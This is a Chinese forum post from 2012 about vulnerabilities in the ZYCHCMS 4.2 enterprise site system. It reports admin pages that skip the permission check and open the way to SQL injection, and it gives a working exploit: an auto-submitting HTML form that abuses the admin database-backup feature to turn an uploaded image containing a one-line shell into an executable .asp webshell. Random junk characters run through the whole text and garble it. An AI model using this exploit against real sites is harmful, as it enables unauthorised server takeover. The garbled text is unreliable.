$ j6 P' U! [# m
; l& L, Z) I8 k1 t: ^9 f3 e; h0 {4 u! _% N
0 [% T' T+ Y% u; X4 o+ i影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀); q4 y6 M% s% {6 ^: d) \1 ~1 e
①SQL注射漏洞! u3 ^. F# b4 d4 C" n. x
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
8 O8 ]' a& R X! t6 n$ g 漏洞原因:未过滤" m* Y# \( e+ J4 T9 j. {1 P! O
漏洞代码:% [; W, a9 m. k; {# s! t0 g' {5 R
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
7 F; L$ W/ Y! ]1 Q/ M5 h# k 修复方法:在文件开头加入代码
# p, k) I; A% x& f! t9 f 3 p, x: J/ v# I6 R! q
; c* ^+ z8 p5 \2 o/ L②后台拿WBSHELL5 k7 ]/ `3 A' ]) z1 w
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。! M4 S% w' e+ ]; D$ a5 ~
这里在网上找了一个,改了下,将就着用。1 S7 M" ]( y7 p. A% `; ^
以下是代码本地提交代码/ f& x6 A5 S% M0 O6 W% d
) o5 v L$ M5 X \' G0 w3 v
2 n& ^( j T# K+ f& ?<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>. e+ k% ^3 `* L6 u9 h
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>% Q$ r8 N0 N! |
<tr>9 E$ w- r0 ^, ]7 g$ k
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>2 c+ n; l% z. N: C
</tr>
5 R; }+ Q6 ]& e2 x; q0 } \$ ^% a <tr>8 s2 c4 U) W9 v3 b' _3 Q
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>8 r1 U/ S# ~ H1 p) t: S& Z/ l
</span>1 g4 J+ e/ B4 x, k
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
2 b m9 L* s- K1 @# g8 x& {) _ <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
% N7 C) g' G# ` <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
4 w7 ~ d: D O) ^0 Y/ [; e <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d# d! V- d; q1 X, C1 i
<div align=”left”>. Z0 x9 y0 ?/ z' A
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
' R* ]; q1 H$ u. Y* Q% }, W# n9 D3 E <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
8 _" X) L W( w; ?7 N <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
# a. W; P) s7 N7 g( N6 F </div></td>
& a0 a: E* p; Y8 d1 C# C </tr>
9 L9 q8 X6 p/ G0 v4 U$ N+ c <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
6 t$ H+ Z/ a" i <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>3 {% ^; L! Y6 z: ]
<td class=”td”><div align=”left”>
4 `! E$ W" D* J2 S0 r( { <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
7 `+ ~/ O: [: d, p [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
7 ~" r5 y9 w6 z2 K </tr>
$ x$ M" c' o6 _5 s1 p2 `4 s <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>& j' m. ?: _: a6 Q/ u' _
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
0 ^, n: L: T1 w+ g/ ]$ ~ <td class=”td”><div align=”left”>; p3 `$ g, u- r, f9 M6 _
<input type=”submit” value=”确定备份” class=”btn”( ~6 K9 F0 u- Y5 |2 N8 x
</div></td>
2 g' D0 d8 n0 T" Q& c9 l# @8 L+ I </tr># s9 e y, F, P8 g
</table></td></tr></form>( a# d/ E) |! i* G/ y7 w
</table>
) x1 m! S, _, `( b' [3 n </td>
( V1 ]5 [% |: S) ]/ a </tr>& {( W: ]: H3 D8 ?
</table>. u7 c- ]0 S% f# J' n$ L( k
<script>
5 W2 v& o2 M* o, Y5 ] document.all.add.submit();
( C# T* T1 \, W# x1 t. I: T3 i& _ </script>) D4 G+ ?& u. k# q7 N+ p
* U% K1 o3 b4 l+ ]2 x, t9 G
" ^/ O6 G, J. W, |/ O3 Y* @ n+ a" w5 h! E- ~4 d( M
" N3 ?6 A9 G, h: q( t3 H
- B8 E0 D9 h" }! L, A0 B$ `* R% I) J+ ?( Z
1 {$ T5 A' h; G7 v: \' p9 t
& ^8 r4 x' ~0 v; J" C
% r( t- K3 n5 `/ q* o q
; ?$ K6 L1 P1 s0 B |
发表于 2012-9-10 21:09:51
收藏
支持
反对